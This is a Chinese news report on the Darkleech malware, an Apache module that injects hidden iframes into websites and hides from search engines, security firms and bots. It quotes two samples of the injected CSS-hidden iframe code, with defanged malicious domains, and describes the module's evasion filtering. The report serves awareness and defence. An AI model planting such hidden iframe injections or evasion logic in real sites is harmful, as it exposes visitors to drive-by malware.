恶意软件Darkleech大肆感染Apache服务器

假设每台服务器十个站点的话,至少有20000个网站被感染,其中包括知名网站如《洛杉矶时报》。

Darkleech主要使用了Apache的模块注入iframe到受害站点中,模块名称如mod_spm_headers.so 或 mod_spm_mem.so,该模块主要功能如下:

1:过滤来自搜索引擎和安全公司的IP地址 2:过滤User-Agent是robot、自动化工具(如Curl, Indy Library等),以及一些IPHONE手机移动客户端等 3:过滤黑名单IP 4:最为复杂的一点,当确认该IP是自然流量之后,该模块会创建一个保持5分钟的session给该IP,然后请求一个js地址,如果用户在该页面浏览了js,那在接下来的7天里不会重复该动作。 5:嵌入恶意的iframe,见下。、

该模块可能在每台服务器上名称不同,当用户访问目标站网站的时候会被连接到恶意的站点。如下代码:

<style>.tlqvepxi { position:absolute; left:-1648px; top:-1752px} </style> <div class="tlqvepxi">

<iframe src="hxxp://matisere .com/21234443.html" width="581" height="476"></iframe></div>

以及 document.write('<style>.hmfabv9 { position:absolute; left:-1141px; top:-1518px} </style> <div class="hmfabv9"> <iframe src="hxxp://sepatch .org/35204443.html" width="122" height="202"></iframe></div>');

所有的数字和style的名称都是随机生成,并且每天数次同步感染受害者的服务器,检查iframe是否存在。

因为网站的其他源码没有变化,所以管理员及时发现被嵌入了iframe,但是很难检测到问题出在哪里。

并且如果来自安全公司和托管公司的IP地址访问了被感染的网站,它不会在终端用户展示的网页中嵌入恶意链接。

目前还不清楚攻击者利用了什么弱点入侵Apache机器,安全研究人员怀疑漏洞可能存在于用于管理网站的软件如Plesk和Cpanel中,也不排除密码破解和社会工程等攻击方法的可能性。

本文分享自微信公众号 - FreeBuf(freebuf)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2013-04-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏菩提树下的杨过

mybatis 3.2.7 与 spring mvc 3.x、logback整合

github上有一个Mybatis-Spring的项目,专门用于辅助完成mybatis与spring的整合,大大简化了整合难度,使用步骤: 准备工作: mave...

28780
来自专栏张善友的专栏

开放式管理基础结构 OMI

Windows 长久以来在 CIM 实施领域一直傲立桥头,而这一切都是从 WMI(Windows 管理基础结构)开始的。分布式管理任务组 (DMTF) 通用信息...

24480
来自专栏张善友的专栏

超经典的JBOSS入门文章

前言   本文是为想在JBOSS环境下进行EJB开发的读者而写的,在阅读本文之前,你最好对EJB有一个基本了解。   JBOSS是一个开放源码的免费EJB服务器...

1.2K60
来自专栏张善友的专栏

在Windows上运行单节点的Cassandra

Cassandra可以安裝在很多系统上, 我是安装在windows server 2008 R2上,安装相当简单,只要把下载下来的压缩包解压缩放到一个目录下就可...

24080
来自专栏挖掘大数据

零基础学习大数据,搭建Hadoop处理环境

由于Hadoop需要运行在Linux环境中,而且是分布式的,因此个人学习只能装虚拟机,本文都以VMware Workstation为准,安装CentOS7,具...

2.1K100
来自专栏张善友的专栏

.NET 2.0 中使用Active Directory 应用程序模式 (ADAM)

Active Directory 应用程序模式 (ADAM) ,由于其目录支持和安全性、可伸缩性和本机轻型目录访问协议 (LDAP) 支持的丰富集成,Micr...

21580
来自专栏挖掘大数据

时代的需要:越来越多的Java工程师开始转向hadoop?

Hadoop是Apache软件基金会的顶级开源项目,是由原雅虎公司Doug Cutting根据Google发布的学术论文而创建的开源项目。Doug Cuttin...

23990
来自专栏DeveWork

WordPress中借助.htaccess屏蔽某个IP或某个IP段(防垃圾评论)

最近本站DeveWork.com 老是被来自142.4.108.109这个ip的垃圾评论骚扰,看来之前的《代码实现 WordPress 反垃圾评论功能》用处还是...

244100
来自专栏张善友的专栏

Windows安装和使用zookeeper

之前整理过一篇文章《zookeeper 分布式锁服务》,本文介绍的 Zookeeper 是以 3.4.5 这个稳定版本为基础,最新的版本可以通过官网 http:...

29790
来自专栏张善友的专栏

开放源代码与.NET应用程序平台的性能测试

您的企业或组织采用哪一种应用程序平台架构?不论哪一种,应用程序平台基本上至少都包含了服务器操作系统、Web服务器软件、数据库服务器软件、程序开发语言,有些平台还...

25390

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励